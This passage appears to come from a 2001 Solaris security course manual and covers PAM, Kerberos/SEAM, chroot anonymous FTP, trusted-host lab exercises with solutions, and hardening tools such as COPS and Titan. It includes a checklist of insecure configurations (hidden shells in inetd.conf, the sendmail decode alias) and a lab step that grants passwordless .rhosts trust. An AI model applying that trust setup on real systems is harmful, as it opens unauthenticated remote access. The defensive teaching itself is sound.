● /usr/bin – Required executable files to support FTP. The in.ftpddaemon needs at least the /usr/bin/ls file.

● /etc – Configuration files used by FTP or other programs (like ls ).The in.ftpd daemon needs at least the following:

● /etc/passwd for ls listings

● /etc/default/ftpd for configuration

● /etc/default/init for the time zone

Note – The /etc/passwd file used by FTP does not need to be the same as/etc/passwd on the real system. You can use a series of dummy accountnames which might sidetrack potential intruders who are unaware of thechroot functionality. FTP does not need the /etc/shadow file, so itshould not be copied into the changed root directory.

● /usr/lib – Required dynamic link libraries. The ldd command listsall required libraries for a given command list. Required dynamiclink libraries for FTP can be obtained using:

# ldd /usr/bin/ftp /usr/bin/ls

● /usr/lib/security – Contains the security database required bymost commands.

● /usr/share/lib/zoneinfo – Contains time zone configurationfiles.

● Include these device files that are required to support networkservices:

● /dev/zero

● /dev/tcp

● /dev/udp

● /dev/ticotsord

● /dev/ticlts

● /dev/null (optional, but most administrators alsocopy this file)



Note – Devices opened from the command line before the FTP is started(such as stdin , stdout , and stderr ) do not need device files.

● A directory for the public FTP files (this is usually a directory called/pub ). The public directory should be read-only to all users.

● A writable subdirectory (if you need users to upload files). To ensurethat no DoS attacks can be attempted (for example by filling the FTParea with user-uploaded files), place the entire area on a separatedisk partition or slice.

The in.ftpd daemon also requires a user called ftp whose homedirectory is the same as the root directory for Anonymous FTP access.

The online manual page for the in.ftpd daemon includes a shell scriptwhich automates the entire process. This script could be easily adaptedfor other network services.

Note – If the in.ftpd daemon is configured to log FTP logins,Anonymous FTP logins are also logged. Because the inted daemoncommunicates directly with the Syslog daemon, no path names arerequired. Running the in.ftpd daemon under the chroot command doesnot require any special configuration.

Pluggable Authentication Module (PAM)



The Pluggable Authentication Module (PAM) framework allows newauthentication technologies to be plugged in without changing systemservices such as login , ftp , telnet , and so on. PAM can also integratethe UNIX login service with other security mechanisms such as theDistributed Computing Environment (DCE), Generic Security Services(GSS), or the Kerberos authentication system—Sun EnterpriseAuthentication Mechanism (SEAM). You can also use this framework toplug in mechanisms for account, session, and password management.

The PAM application program interface (API) and Kerberos complementeach other: The PAM API supports user authentication by the systementry servers while Kerberos supports network-based client–serverauthentication. Therefore, when users on client systems are authenticatedthrough PAM, they can communicate securely with other Kerberosnetwork services.

PAM is integrated into the Solaris 8 OE. PAM is also available on otherversions of UNIX.



PAM Runtime Modules

PAM uses runtime pluggable modules to provide authentication for localand remote system entry services. These modules are organized into fourdifferent function types:

● Authentication modules – Provide authentication for users and allowcredentials to be set, refreshed, or destroyed. Authenticationmodules are useful as an administration tool.

● Account modules – Check for password aging, account expiration,and access time restrictions. After the user is identified through theauthentication modules, the account modules determine if the user isallowed access.

● Session modules – Manage the opening and closing of anauthentication session. Session modules can log activity or clean upafter the session is over.

● Password modules – Provide the mechanism for changing apassword.



The module services can be stacked, which provides:

● User authentication through the use of multiple services. The PAMframework provides a method for authenticating users with multipleservices using stacking. Depending on the configuration, the usercan be prompted for passwords for each authentication method. Theorder in which the authentication services are used is determinedthrough the PAM configuration file.

● A password-mapping feature. The stacking method can require usersto remember several passwords. With the password-mapping featureenabled, the primary password decrypts the other passwords, so thatthe user does not have to enter multiple passwords. Another optionis to synchronize the passwords across each authenticationmechanism.

Note – Synchronized passwords could increase the security risk, becausethe security of each mechanism is limited by the least secure passwordmethod used in the stack.

The pam_unix Module

The pam_unix module, /usr/lib/security/pam_unix.so.1 , providessupport for all four types of runtime modules. This module uses UNIXpasswords for authentication. The /etc/nsswitch.conf file defines thefollowing name services which control password records:

● dial_auth – You can only use the/usr/lib/security/pam_dial_auth.so.1 module forauthentication. (See the pam_dial_auth manpage.) The dial_authuses data stored in the /etc/dialups and /etc/d_passwd files forauthentication. The dial_auth service is mainly used by the logincommand.

● rhosts_auth – You can also use the/usr/lib/security/pam_rhosts_auth.so.1 module forauthentication. (See the pam_rhosts_auth man page.) Therhosts_auth module uses data stored in the ~/.rhosts and/etc/host.equiv files and the rlogin and rsh commands.

Note – For security reasons, these module files must be owned by theroot user and must not be writable through group or other permissions.If the file is not owned by the root user, PAM does not load the module.



Figure 13-1 shows how the PAM modules relate to each other andthe network services using them:.

Figure 13-1 PAM Module Structure

The ftp , telnet , and login applications use the PAM library to accessthe appropriate module. The /etc/pam.conf configuration file defines:

● Which PAM modules to use

● In what order to use modules with each application

Responses from the modules are passed back through the library to theapplication.

PAM Library

The PAM library, /usr/lib/libpam , provides the framework to load theappropriate modules and manage the stacking process. It also provides ageneric plug-in structure for the modules.



PAM Configuration File

The /etc/pam.conf file controls the PAM configuration, determineswhich authentication services to use, and in which order theauthentication services are used. You can edit this file to selectauthentication mechanisms for each system-entry application.

Configuration File Syntax

The /etc/pam.conf PAM configuration file consists of lines oftab-separated entries with the following syntax:

service_name module_type control_flag module_path module_options



Code 13-2 shows a portion of a PAM configuration file.

Code 13-2 PAM Configuration File Syntax

1 login auth required /usr/lib/security/pam_unix.so.12 su auth requisite /usr/lib/security/pam_inhouse.so.13 su auth required /usr/lib/security/pam_unix.so.1debug

Code 13-2 consists of:

● service_name – Name of the service: ftp , login , or telnet.

● module_type – Module type for the service: auth , account ,session , or password .

● control_flag – Continuation or failure semantics for the module:requisite , required , sufficient , or optional . These flags aredescribed in “PAM Control Flags” on page 13-31.

● module_path – Path to the library object that controls the service’sfunction.

● module_options – Module-specific options that are passed to theservice modules. The values for this field can be found in the manualpages for each module. For example, the pam_unix module has theuse_first_pass and try_first_pass options which allow users toreuse the same password for authentication without retyping it.

An entry in the PAM configuration file is incorrect if:

● The line has less than four fields

● An invalid value is given for module_type or control_flag

● The named module is not found



PAM Control Flags

Control flags indicate how to handle a successful or a failed attemptthrough each module. The control flags also determine the continuation orfailure behavior of a module during the authentication process.

You must use one of the four control flags (requisite , required ,optional , or sufficient ) for each entry. These flags apply to all moduletypes. The control flags, when used for authentication modules, cause thefollowing behaviors:

● requisite – The module must return success for additionalauthentication to occur. If a failure occurs for a module flagged asrequisite , an error is returned to the application and no additionalauthentication is done. If the stack does not include prior failedmodules labeled as required , then the error from the currentmodule is returned. If an earlier module labeled as required hasfailed, the error message from the earlier module is returned.



● required – The module must return success for the overall result tobe successful. If all of the modules are labeled required , thenauthentication through all modules must succeed for the user to beauthenticated. If some of the modules fail, then an error value fromthe first failed module is reported. If a failure occurs for a moduleflagged as required , all modules in the stack are still tried butfailure is returned. If none of the modules are flagged as required,then only one of the entries for that service must succeed for the userto be authenticated.

● optional – If this module fails, the overall result can be successful ifanother module in this stack returns success. Use the optional flagwhen one success in the stack is enough for a user to beauthenticated. Use this flag only if it is not important for thisparticular mechanism to succeed. If your users need to havepermissions associated with a specific mechanism, do not label themodule optional .

● sufficient – If this module is successful, skip the remainingmodules in the stack, even if they are labeled required . Thesufficient flag indicates that one successful authentication isenough to grant the user access.

Example PAM Configuration

Code 13-3 shows an example PAM configuration file.

Code 13-3 PAM Configuration File

1 # cat /etc/pam.conf2 #ident "@(#)pam.conf 1.15 00/02/14 SMI"3 #4 # Copyright (c) 1996-1999 by Sun Microsystems, Inc.5 # All rights reserved.6 #7 # PAM configuration8 #9 # Authentication management10 #11 login auth required /usr/lib/security/$ISA/pam_unix.so.112 login auth required/usr/lib/security/$ISA/pam_dial_auth.so.113 #14 rlogin auth sufficient/usr/lib/security/$ISA/pam_rhosts_auth.so.115 rlogin auth required /usr/lib/security/$ISA/pam_unix.so.1



16 #17 dtlogin auth required /usr/lib/security/$ISA/pam_unix.so.118 #19 rsh auth required/usr/lib/security/$ISA/pam_rhosts_auth.so.120 other auth required /usr/lib/security/$ISA/pam_unix.so.121 #22 # Account management23 #24 login account requisite /usr/lib/security/$ISA/pam_roles.so.125 login account required/usr/lib/security/$ISA/pam_projects.so.126 login account required /usr/lib/security/$ISA/pam_unix.so.127 #28 dtlogin account requisite /usr/lib/security/$ISA/pam_roles.so.129 dtlogin account required/usr/lib/security/$ISA/pam_projects.so.130 dtlogin account required /usr/lib/security/$ISA/pam_unix.so.131 #32 other account requisite /usr/lib/security/$ISA/pam_roles.so.133 other account required/usr/lib/security/$ISA/pam_projects.so.134 other account required /usr/lib/security/$ISA/pam_unix.so.135 #36 # Session management37 #38 other session required /usr/lib/security/$ISA/pam_unix.so.139 #40 # Password management41 #42 other password required /usr/lib/security/$ISA/pam_unix.so.143 dtsession auth required /usr/lib/security/$ISA/pam_unix.so.144 #

In Code 13-3 on page 13-32, the $ISA variable expands to the architectureof the current system, which allows one configuration file for multiplearchitectures.



In Code 13-3 on page 13-32, the example file defines that:

● For login , authentication is required for both the pam_unix and thepam_dial_auth modules (Lines 11–12).

● For rlogin , if authentication through pam_rhost_auth fails,authentication through the pam_unix module must succeed. Thesufficient control flag indicates that if authentication throughpam_rhost_auth module succeeds, the pam_unix authentication isskipped (Lines 14–15).

● Authentication for rsh must succeed through the pam_rhosts_authmodule (Line 19).

● The other service name allows you to set a default for any othercommands requiring authentication. The other option makes iteasier to administer the file, because many commands using thesame module can be covered with one other entry. In addition, theother service name ensures that each access is covered by onemodule. By convention, the other entry is included at the bottom ofthe section for each module type (Line 20 is the first example of another entry).

● The remaining entries in the file configure the account, session, andpassword management.

The /usr/lib/security/$ISA/ path is placed in front of the file name ifan absolute path is not used. Therefore, use a full path name for moduleslocated in other directories.

If login specifies authentication through both the pam_local andpam_unix modules, then the user must enter a password for each module.If both passwords are the same, the use_first_pass module optionprompts the user for only one password and uses that password toauthenticate the user for both modules. If the passwords are different, theauthentication fails. Use this option with an optional control flag, asshown in Code 13-4, to ensure that the user can log in.

Code 13-4 The use_first_pass Authentication Option

1 # Authentication management2 login auth required /usr/lib/security/$ISA/pam_unix.so.13 login auth optional /usr/lib/security/$ISA/pam_local.so.1use_first_pass



Deploying PAM

Before you decide how to employ PAM in an environment, you shouldaddress these issues first:

● Determine which modules to use

● Identify the services that need special attention; use the otherservice where appropriate so that every application does not have tobe included

● Decide on the order in which the modules should be run

● Select the control flag for that module

● Choose any options necessary for the module

Note – Consider the security implications when using the sufficientand optional control flags.



Adding a PAM Module

To add a PAM module, follow these steps:

1. Become superuser.

2. Determine which control flags and other options to use.

3. Copy the new module to the /usr/lib/security directory.

4. Change the owner of the module to the root user with permissions555.

5. Edit the /etc/pam.conf PAM configuration file and add thismodule to the appropriate services.

Caution – The superuser might not be able to log in if the PAMconfiguration file is misconfigured or becomes corrupted. The superusermight have to boot the machine into single-user mode to fix the problem.

6. Review the /etc/pam.conf file after making any changes effective.



7. Test the services to ensure that the configuration file has not beenmisconfigured. Use the rlogin , su , and telnet services.

Note – If the service being tested is a daemon that is launched when thesystem is booted, you might need to reboot the system to verify that themodule has been added.

8. Reboot the system and test all affected services again.



Disabling Remote Access Using PAM

You can use PAM access control to disable the trusted host mechanism(/etc/hosts.equiv and .rhosts files) on a server.

To disable trusted hosts for the rlogin command remove this entry fromthe PAM configuration file (/etc/pam.conf ):

rlogin auth sufficient /usr/lib/security/$ISA/pam_rhost_auth.so.1

Deleting the previous line prevents the /etc/hosts.equiv and$HOME/.rhosts files from being accessed during an rlogin session andprevents unauthenticated access to the local system from remote systems.All rlogin accesses require a password, regardless of the presence orcontents of any $HOME/.rhosts or /etc/hosts.equiv files.

To disable the rsh service, delete the line:

rsh auth required /usr/lib/security/$ISA/pam_rhosts_auth.so.1



Deleting this line stops unauthenticated access to the $HOME/.rhosts file.

In practice, you should stop the remote services from running bycommenting out the following lines in the /etc/inetd.conf file:

shell stream tcp nowait root /usr/sbin/in.rshd in.rshdlogin stream tcp nowait root /usr/sbin/in.rlogind in.rlogind

Users can use the telnet command as an alternative to the rlogincommand.



Initiating PAM Error Reporting

You can configure the PAM error reporting mechanism to:

● Display alert messages on the console

● Mail critical messages to the root user

● Append informational and debug messages to the/var/log/pamlog file

● Report errors using the Syslog utility

● Report the Facility label is auth

To configure PAM error reporting, follow these steps:

1. Add the following PAM error reporting entries to the/etc/syslog.conf file:

a. auth.alert /dev/console

b. auth.crit "root"

c. auth.info;auth.debug /var/log/pamlog



2. Create the log file.

# touch /var/log/pamlog; chmod 600 /var/log/pamlog

3. Restart the syslog daemon or send the daemon a SIGNUPsignal toactivate the PAM error reporting.

# /etc/init.d/syslog stopStopping the syslog service.# /etc/init.d/syslog startsyslog service starting.

Each line in the pamlog file contains a time stamp, the name of the systemthat generated the message, and the message itself.

Note – The pamlog file can become very large as large amounts ofinformation are logged.

Sun Enterprise Authentication Mechanism (SEAM)



SEAM is a client–server authentication mechanism based on Kerberos 5.SEAM is a single sign-on system which authenticates the user once andthen grants access to authorized network resources automatically. SEAMdoes not transmit unencrypted passwords across the network.

Enhancing Security Using Kerberos v5

In 1983, the Massachusetts Institute of Technology (MIT), IBM, and DigitalEquipment Corporation began work on the Athena Project to develop anintegrated network environment for the university campus. The AthenaProject developed a solution called Kerberos to solve the securityproblems of working with insecure computers (PCs running MS-DOS)and an open network susceptible to sniffing attacks.



Kerberos is an authentication system which uses Data EncryptionStandard (DES) cryptography to protect sensitive information such aspasswords on an open network. When a users logs onto a system runningKerberos, the user is issued a ticket supplied by the KerberosAuthentication server. The ticket can only be decrypted with the user’spassword and contains information necessary to obtain additional tickets.From that point, whenever the user wants to access a network service, avalid ticket must be presented. These tickets are obtained from theKerberos server. All of the information in a Kerberos ticket is encryptedbefore it is transmitted over the network.

The Kerberos server stores the user name and password informationlocally. Passwords are never transmitted over the network. Unlike UNIX,Kerberos uses a reversible encryption algorithm (DES), so passwords canbe decrypted when they are required. Allowing the passwords to bedecrypted is a weakness in the system because the Kerberos server mustbe secure and invulnerable to attack. An intruder that breaks–in to theKerberos server has access to all of the passwords on the network.Kerberos was developed before public key encryption such as RSA(Rivest Shamir Adleman – the professors who developed the RSAalgorithm) and Diffie Hellman algorithms were publicly available.



Logging in Using Kerberos v5

Users logging in to a Kerberos protected system enter their user namesand passwords as usual. The system contacts the Kerberos Authenticationserver, sending a data packet with the user name and the current systemtime encrypted with the user’s password. If the Kerberos server candecrypt the time in the user’s data packet, it returns a ticket-granting-ticket, encrypted with the user’s password. The user’s system can nowcontact the Kerberos ticket granting server to obtain tickets for access tonetwork services.



Kerberos Features

Kerberos contains the following features:

● Passwords are only stored on the Kerberos server.

● The user’s password is never transmitted across the network.

● The Kerberos Authentication server can validate the user’s identitybecause it stores the user’s password. Part of the Kerberos systemsetup requires that the user’s password be stored on the Kerberosserver.



● The user can validate the Kerberos server’s identity because it knowsthe user’s password.

● Network sniffing can only pick up encrypted Kerberos data packetsor tickets.

Note – Encrypted Kerberos packets have a well–known data format andare more susceptible to decrypting than a packet whose plain text isentirely unknown. Kerberos tickets have a limited lifetime. Kerberostickets expire and new versions must be issued. The lifetime of a Kerberosticket is less than the time it currently requires to break the encryptionusing brute force techniques.

Understanding Kerberos Limitations



Kerberos is a good solution to a difficult problem but it has the followinglimitations:

● Using Kerberos is not transparent. Every network service (forexample login ) requires modifications to use the mechanism.

● Kerberos does not work well with multi-user systems. Kerberos wasdesigned for single–user workstations and stores tickets in the /tmpdirectory. These tickets can be stolen and used for fraudulent accessto the network services.



● The Kerberos Authentication server is a weak point. Special caremust be taken to ensure the security and integrity of this system.

● The Kerberos Authentication server must be continuously available.Therefore, it is a single point of failure.

● Kerberos stores all DES encrypted passwords using a single keywhich is stored on the hard disk of the Authentication server. If theAuthentication server is ever compromised, all network passwordsmust be changed.



Configuring SEAM Clients

To configure a SEAM client, you must modify the PAM configuration files.You must enhance the standard /etc/pam.conf configuration to includethe Kerberos authentication module/usr/lib/security/pam_krb5.so.1 for every service that requiresSEAM.

The standard PAM configuration file contains the required lines for thisconfiguration, therefore you only need to uncomment the appropriatelines. The Solaris AnswerBook includes step-by-step instructions forconfiguring SEAM.



Uncomment the lines shown in Code 13-5 in the standard /etc/pam.conffile to use the SEAM Kerberos authentication modules.

Code 13-5 Using SEAM Kerberos Authentication Modules

1 rloginauth optional /usr/lib/security/$ISA/pam_krb5.so.1try_first_pass2 login auth optional /usr/lib/security/$ISA/pam_krb5.so.1try_first_pass3 dtlogin auth optional /usr/lib/security/$ISA/pam_krb5.so.1try_first_pass4 other auth optional /usr/lib/security/$ISA/pam_krb5.so.1try_first_pass5 #6 dtlogin account optional /usr/lib/security/$ISA/pam_krb5.so.17 other account optional /usr/lib/security/$ISA/pam_krb5.so.18 other session optional /usr/lib/security/$ISA/pam_krb5.so.19 other password optional /usr/lib/security/$ISA/pam_krb5.so.1 /10 try_first_pass11

To use SEAM across your network, you must install a SEAM (Kerberos)server. The SEAM server is available under license from SunMicrosystems (see http://www.sun.com/solaris/ds/ds-seam.html ).

Exercise: Securing Network Services




● Disable some network services

● Configure trusted hosts

● Disable trusted host configuration files using PAM

● Set up Anonymous FTP

Preparation

Ensure that you know the host name of your workstation and identify anearby colleague who you will work with to test and secure each other’snetwork services.

Tasks

Although these tasks are written for people working in pairs, you canwork through the questions alone by configuring and testing your ownworkstation.


Task – Disabling Network Services

To disable Network Services:

1. Verify that you can run the finger command to find out who islogged in to your colleague’s system. For example:

# finger @ otherhost



2. Run finger for one of the users to get further details about that useron the other workstation. Use the command format below or youwill not use the network finger command but a local version whichgets details of users on your workstation.

# finger user @otherhost

You can always prime the data by using the telnet command to loginto the system as the user alice , bob , or eve .

3. Ensure that your colleague can run the same commands on yoursystem.

4. Both of you should now disable the finger service in/etc/inet.conf and verify that you can no longer run the fingercommand to obtain data from your colleague’s workstation.

Task – Understanding Trusted Hosts

1. Look at the three example trusted hosts files shown in Code 13-6.

Code 13-6 Trusted Hosts Files

1 # hostname2 wallace3 # more /etc/hosts.equiv4 grommit5 # more /.rhosts6 penguin7 # /export/home/alice/.rhosts8 penguin9 sean awonder

2. Answer the following questions:

a. Can the root user on grommit copy files to and from wallace ?

b. Can user alice on grommit run commands on wallace ?

c. Can user alice on penguin run commands on wallace ?

d. Can the root user on wallace copy files to and from penguin ?

e. Can user awonder on sean run commands on wallace ?

f. Can the root user on grommit log in to wallace ?



Task – Configuring Trusted Hosts

Working with your partner, set up your systems so that the root user andthe user alice (but no other user) can run remote commands and copyfiles remotely.

Task – Disabling Trusted Hosts

Working with your partner, configure PAM so that the rsh and rcpcommands cannot be used and configure the rlogin command so that italways requires a password from the remote user.

Task – Configuring Anonymous FTP

Read the manual page for the in.ftpd daemon and follow theinstructions to configure Anonymous FTP (the manual page includes ashell script which automates the entire process).

Extract the shell script from the manual page by redirecting the outputfrom the mancommand to a text file and editing out the non-shell scriptinformation.

For example:

# man in.ftpd >ftp.sh

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following paragraphs describe the Solaris OE commands necessary tosolve the problems posed in the exercises for this module.

Disabling Network Services

Edit the /etc/inetd.conf file and comment out the following line:

#finger stream tcp6 nowait nobody /usr/sbin/in.fingerd in.fingerd

Send the hang-up signal to the inetd process (get the process ID from theps listing):

# ps -ef | grep indetd# kill -HUP pid

The finger command should now fail with a connection refused errormessage.

Understanding Trusted Hosts

Answers to the questions:

a. Can the root user on grommit copy files to and from wallace ?

No. hosts.equiv grants access to all users on grommit except theroot user and the file /.rhosts does not list grommit as a trustedhost.

b. Can user alice on grommit run commands on wallace ?

Yes. hosts.equiv grants access to all users on grommit exceptroot .

c. Can user alice on penguin run commands on wallace ?

Yes. While hosts.equiv does not grant access to users on penguin ,the .rhosts file of user alice does list penguin .

d. Can the root user on wallace copy files to and from penguin ?

Unknown. The trusted hosts files on penguin control access topenguin , and these have not been shown.

Exercise Solutions


e. Can user awonder on sean run commands on wallace ?

Yes, as long as the -l option is used. The .rhosts file of user alicedoes list the host sean and the user awonder , but the command mustbe run as user alice . For example:

# rsh -l alice wallace ls -l

f. Can the root user on grommit log in to wallace ?

Yes, but a password is required. The trusted host files do not allow thercp or rsh commands to run but will not stop the rlogin command.A valid password must be supplied.

Configuring Trusted Hosts

Identify the host name of your colleague’s system. For the purposes ofthis solution this is otherhost . To grant root access to otherhost add aline to your /.rhosts file:

# cat >>/.rhostsotherhost^D

To grant access to user alice , do the same thing to alice’s .rhosts file(make sure alice owns the .rhosts file).

# su - alice$ cat >>~/.rhostsotherhost^D$ exit

Your colleague must do the same but must specify your host nameinstead of otherhost .

The rsh and rcp commands now work as required.

Exercise Solutions


Disabling Trusted Hosts

Edit the /etc/pam.conf file and comment out the rlogin and rsh lineswhich refer to the pam_rhosts_auth.so.1 authentication module. Makesure that rlogin still has the pam_unix.so.1 module defined or rlogindoes not prompt for a password. For example:

# rlogin auth sufficient /usr/lib/security/$ISA/pam_rhosts_auth.so.1rlogin auth required /usr/lib/security/$ISA/pam_unix.so.1

# rsh auth required /usr/lib/security/$ISA/pam_rhosts_auth.so.1

The rsh and rcp commands no longer work and rlogin always promptsfor a password.

Note – On a live system you would disable the rsh and rlogin networkservice by editing /etc/inetd.conf rather than removing theauthentication modules. However, if your users want to use the rloginservice rather than the telnet service, then disabling the trusted hostsfiles for the rlogin service is a sensible precaution.

Configuring Anonymous FTP

1. Create a user called ftp whose home directory is the Anonymousftp area. This user should be in a separate group from all other usersand should not have a valid login shell. Use the commands:

# groupadd -g 30000 ftp# useradd -u 30000 -g 30000 -c "Anonymous FTP" -s /usr/bin/false \

-d /export/anon ftp2. The ftp user should not have a valid password. The default

password is *LK* , which has locked the account from login. Youmight want to edit the /etc/shadow file and set the password to NPto show that this account is never used.

3. Extract the “make Anonymous FTP” script from the in.ftpdmanual pages as shown in “Task – Configuring Anonymous FTP” onpage 13-53. If you want, run the following sed command whichextracts the script automatically (be sure to enter the script exactly asshown):

# man in.ftpd | sed -n '{> s/ [ ]*//> / $/d> / SunOS/d

Exercise Solutions


> / Maintenance/d> / #!/,/ #chmod 1755 ${ftphome}\/pub/p> }' >mkftp

4. Make the script executable using:

# chmod +x mkftp5. Execute this script:

# ./mkftp

This script obtains the Anonymous FTP directory from the ftp user in the/etc/passwd directory and copies in all the required programs, libraries,and device files.

6. Test your Anonymous FTP account by running FTP to connect toyour workstation and log in as anonymous (use any password):

1 # ftp localhost2 Connected to 192.168.1.2.3 220 wallace FTP server (SunOS 5.8) ready.4 User (192.168.0.250:(none)): anonymous5 331 Guest login ok, send ident as password.6 Password:7 230 Guest login ok, access restrictions apply.8 ftp> ls9 200 PORT command successful.10 150 ASCII data connection for /bin/ls (192.168.0.1,1057) (0 bytes).11 bin12 dev13 etc14 local.cshrc15 local.login16 local.profile17 pub18 usr19 226 ASCII Transfer complete.20 ftp: 66 bytes received in 0.22Seconds 0.30Kbytes/sec.21 ftp>


Module 14

Hardening the System

Objectives


● List at least two reasons for hardening a system

● Describe the role of Titan in a secure system

● Install and configure Titan

● Write a Titan module

● Configure and use the Automated Security Enhancement Tool(ASET)

Relevance


Relevance

?!

Discussion – The following questions are relevant to understanding therole of system hardening:

● Do your default file system permissions provide a secure installation?

● Are all your user accounts configured in a secure manner?

● Have you secured all of your system’s network services?

● Do you need to apply the same changes to multiple systems?

● Can you automate any of these standard security measures?


Hardening the System 14-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Online Manual pages for aset(1) .



● Frisch, Aeleen. System Administration. 2nd Ed, O’Reilly &Associates, Inc. 1995.

● Solaris OE Security Toolkit;[http://www.sun.com/security/jass ]

● Solaris Operating Environment Whitepapers on Security;[http://www.sun.com/blueprints/1299/minimization.pdf ][http://www.sun.com/blueprints/1299/network.pdf ][http://www.sun.com/blueprints/0100/security.pdf ][http://www.sun.com/blueprints/tools ]

● COPS online resources;[ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/cops ]

● Tiger online resources;[ftp://ftp.cerias.purdue.edu/pub/tools/unix/scanners/tiger ]

● Titan online resources;[http://www.fish.com/titan/ ]

System Hardening


System Hardening

The goal of system hardening is to install the Solaris OE so that itprovides good host security from the outset without you spending hoursmaking security modifications. You can harden the system by using shellscripts or Perl scripts which are run immediately after installation of anew workstation or server, or are included as part of a JumpStart™configuration.

Hardening involves one or more of the following steps:

● Checking file permissions, ownerships, and digests

● Checking for user, group, and password insecurities

● Checking network services for secure configurations

● Performing any other checks the tool provider considers useful

Some tools only report on potential problems, while others actually securethe host system.

System Hardening


Commonly Available Hardening Tools

Several freeware tools are available to help with system hardening.

The following sections discuss these tools.

System Hardening


COPS

Computer, Oracle, and Password System (COPS) is a set of programs thatattempts to automate security checks often performed manually (orperhaps with self-written short shell scripts or programs) by a systemadministrator.

COPS does not correct problems, but instead issues a report for theadministrator. COPS runs on most major UNIX platforms and is notspecific to the Solaris OE.

COPS checks and reports on the following:

● File, directory, and device permissions and modes.

● Poor passwords.

● Content, format, and security of password and group files.

● The programs and files run in /etc/rc* and crontab files.

● The existence of root -SUID (set–user–ID) files, their writability, andwhether they are shell scripts.

System Hardening


● A cyclic-redundancy-check (CRC) against important binaries or keyfiles to report any changes therein.

● Writability of user’s home directories and startup files (.profile ,.cshrc , and so on).

● Anonymous FTP setup.

● Insecure network configuration, including:

● Unrestricted TFTP

● Decode alias in the sendmail program

● SUID uudecode problems

● Hidden shells inside inetd.conf

● The rexd daemon running in inetd.conf

● Miscellaneous root checks, such as:

● Current directory in the search path

● A “+” in the /etc/host.equiv file

● Unrestricted NFS mounts.

● Ensuring that the root user is in the /etc/ftpusers file

● Dates of Computer Emergency Response Team (CERT) advisories incomparison with key files. This checks the dates that various bugsand security holes were reported by CERT against the actual date onthe file in question.

● The Kuang expert system. This takes a set of rules and tries todetermine if your system can be compromised.

System Hardening


Tiger

Tiger is a set of scripts that scan a UNIX system looking for securityproblems in the same way as COPS. Tiger was originally developed tocheck UNIX systems on the Texas A&M University campus that needed tobe accessed from off campus.

The primary purpose of many of the Tiger checks is to protect thesuperuser account, and the philosophy behind Tiger is that any otheraccount or any group can be attacked and breached. Tiger’s goal is toprotect the root user from all accounts, even system accounts.

System Hardening


Solaris Security Toolkit

Sun's Enterprise Engineering and Professional Services organizationsdeveloped the Solaris Security Toolkit (formerly JumpStart™ Architectureand Security Scripts [JASS] Toolkit) to harden, minimize, and secureSolaris OE systems. The Toolkit simplifies and automates the process ofsecuring Solaris OE systems. The Toolkit can be used through theJumpStart program or in a standalone mode.

The Toolkit is a set of scripts and files that automatically harden SolarisOE systems. The security enhancements contained in the Toolkit arebased on recommendations made in Sun BluePrint™ Online articles:

● Solaris Operating Environment Minimization for Securityhttp://www.sun.com/blueprints/1299/minimization.pdf

● Solaris Operating Environment Network Settings for Securityhttp://www.sun.com/blueprints/1299/network.pdf

● Solaris Operating Environment Securityhttp://www.sun.com/blueprints/0100/security.pdf

System Hardening


Use the JASS Toolkit to execute these scripts from a JumpStart server atthe time of installation. You can also use the Toolkit directly from thecommand line to secure existing systems. The Toolkit can be run multipletimes on the same client and can perform the same tasks with no adverseaffects which allows you to schedule the scripts on a regular basis usingthe cron utility or after applying operating system patches.

Titan

Titan is discussed in detail in “Using Titan” on page 14-11. It is a free,host-based security tool that can improve or audit the security of a UNIXsystem. It can fix or detect potential security problems.

ASET

Automated Security Enhancement Tool (ASET) is a standard Solaris OEutility which reports and potentially corrects a number of securityproblems. ASET is discussed in detail in “Enhancing System SecurityUsing ASET” on page 14-26.

Using Titan


Using Titan

Titan is a collection of programs which fixes or tightens security problemsin the setup or configuration of a UNIX system. Titan was created by BradPowell of Sun Microsystems. Titan is written in Bourne shell and itsmodular design allows anyone who can write a shell script or program toadd to it.

Titan automates the process of tightening up the operating system security(its name is a pun on the word tighten). Titan is not a replacement forother tools, but it helps simplify some security measures.

Titan does not duplicate much of the functionality of COPS and Tiger, souse it in conjunction with these tools to provide a strong toolset forhardening file systems.

Although Titan was developed primarily for the Solaris OE, it is alsoavailable for SuSE and Redhat versions of Linux.

Using Titan


Titan Design Goals

Titan is a system hardening and intruder detection tool. Its design goalsare:

● After running Titan, the system should be more secure than before.

● Titan’s actions produce a consistent and understandably securesystem.

● Titan allows the administrator to control what Titan modules to run.Because Titan is flexible and you have the full source code, you canremove unwanted security fixes.

● Titan is easily extended. You can place shell scripts or otherprograms into Titan's framework, and they run alongside all theother programs.

Titan does not attempt to fix all security issues. For example it does not:

● Fix software or script bugs

● Check for poor passwords

● Install patches

● Check for COPS, Tiger, or SAINT-like problems

Titan is not meant to be run once and forgotten, but should be used aspart of a regular process of sweeping the system for traces of successfulbreak-ins.

System administrators concerned about security should have considered,if not resolved or fixed, many of the problems that Titan covers. Titanhelps you because it is systematic. You do not need to wonder if youfinished applying all your changes. Run Titan in verify mode and itreports on all the things that Titan thinks need hardening.

Using Titan


Using Titan Modules

Titan is built around a large number of modules (more than sixty), each ofwhich focuses on reporting and fixing a particular security problem. Titanmodules have a defined structure to make it easy for you to write yourown modules.

You can use Titan to run some or all of the modules by editing aconfiguration script. Sample configuration scripts for workstations andservers are included in the Titan package. Not all of the Titan modulesshould run on all systems.

Using Titan


Table 14-1 describes some of the modules that can be run on a system (afull list of the modules is included in the Titan documentation).

Table 14-1 Some Titan Modules

Module Usage

add-umask.sh Adds system–wide umask for rc?.d fileswhich causes the system daemon tocreate more secure files.

bsm.sh Verifies that the Basic Security Module(BSM) is enabled. It configures auditingevents by modifying the/etc/security/audit_control file.

create-issue.sh Creates the /etc/issue banner displayedat login time.

cronset.sh Checks or fixes CRONLOG-YES in the/etc/default/cron file, rotates the cronlog files at 2 Mbytes, and changes thecron permissions.

decode.sh Looks for any “| ”characters in the/etc/aliases file and fixes them.

defloginparams.sh Resets the /etc/default/login fileparameters to a stricter mode.

defpwparams.sh Resets the /etc/default/password fileparameters to a stricter mode.

disable-accounts.sh

Disables system accounts like bin anddaemon and creates a/usr/sbin/noshell script.

disable-ping-echo.sh

Disables theip_respond_to_echo_broadcastservice so that specific ping crashes (fromSmurf attacks) do not work. It also hidesthe system from some network probeagents that use a broadcast pingcommand to discover host names.

file-own.sh Changes system files (mainly in the /usrdirectory) to be owned by the root user.

Using Titan


